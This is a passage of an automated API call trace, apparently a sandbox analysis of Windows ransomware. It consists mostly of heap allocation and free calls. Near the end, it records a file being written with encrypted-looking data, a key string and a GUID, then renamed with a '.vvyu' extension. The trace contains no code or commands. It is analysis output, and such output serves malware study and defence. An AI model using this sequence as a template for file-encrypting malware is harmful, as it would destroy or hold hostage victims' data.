(HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6428 [0194.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0194.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63e0 [0194.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0194.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae63c8 [0194.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0194.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0194.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0194.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0194.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0194.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0194.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0194.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0194.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63e0 | out: hHeap=0x2c0000) returned 1 [0194.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0194.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63c8 | out: hHeap=0x2c0000) returned 1 [0194.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0194.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0194.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6428 | out: hHeap=0x2c0000) returned 1 [0194.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0194.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0194.930] GetCurrentThreadId () returned 0x5d8 [0194.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0194.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae8028 [0194.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0194.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0194.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0194.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0194.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0194.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0194.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.931] GetCurrentThreadId () returned 0x5d8 [0194.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0194.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0194.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0194.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0194.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0194.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0194.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0194.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6428 [0194.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0194.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0194.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0194.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0194.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0194.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0194.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0194.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0194.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63c8 [0194.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0194.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0194.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0194.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0194.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0194.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0194.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0194.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63e0 [0194.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0194.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0194.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0194.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63b0 [0194.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0194.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6440 [0194.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0194.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0194.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0194.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6410 [0194.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0194.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63f8 [0194.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0194.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6458 [0194.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63f8 | out: hHeap=0x2c0000) returned 1 [0194.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63f8 [0194.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6410 | out: hHeap=0x2c0000) returned 1 [0194.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0194.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0194.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0194.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0194.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0194.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63c8 | out: hHeap=0x2c0000) returned 1 [0194.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63c8 [0194.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0194.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0194.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6428 | out: hHeap=0x2c0000) returned 1 [0194.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0194.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6458 | out: hHeap=0x2c0000) returned 1 [0194.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0194.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0194.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0194.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0194.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63c8 | out: hHeap=0x2c0000) returned 1 [0194.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0194.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0194.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0194.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0194.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0194.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0194.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0194.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0194.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0194.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0194.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0194.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63f8 | out: hHeap=0x2c0000) returned 1 [0194.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0194.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6440 | out: hHeap=0x2c0000) returned 1 [0194.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0194.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63e0 | out: hHeap=0x2c0000) returned 1 [0194.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63b0 | out: hHeap=0x2c0000) returned 1 [0194.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0194.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0194.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0194.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6398 | out: hHeap=0x2c0000) returned 1 [0194.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2338 | out: hHeap=0x2c0000) returned 1 [0194.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0194.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0194.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0194.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0194.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0194.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0194.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0194.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0194.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0194.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0194.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0194.942] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x54bb, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x54bb, lpOverlapped=0x0) returned 1 [0194.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0194.943] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x54c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.943] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0194.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0194.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0194.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0194.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0194.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0194.946] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.947] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.947] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.947] CloseHandle (hObject=0x584) returned 1 [0195.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0195.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0195.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0195.062] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\l5cha-37fB.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\26hkdh\\l5cha-37fb.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\l5cha-37fB.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\26hkdh\\l5cha-37fb.mp3.vvyu")) returned 1 [0195.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0195.064] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x345758 | out: hHeap=0x2c0000) returned 1 [0195.068] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70cf6e80, ftCreationTime.dwHighDateTime=0x1d89b24, ftLastAccessTime.dwLowDateTime=0x90c53170, ftLastAccessTime.dwHighDateTime=0x1d89ef8, ftLastWriteTime.dwLowDateTime=0x90c53170, ftLastWriteTime.dwHighDateTime=0x1d89ef8, nFileSizeHigh=0x0, nFileSizeLow=0x54c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="l5cha-37fB.mp3", cAlternateFileName="L5CHA-~1.MP3")) returned 0 [0195.068] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0195.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0195.069] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0195.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0195.069] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0195.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0195.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 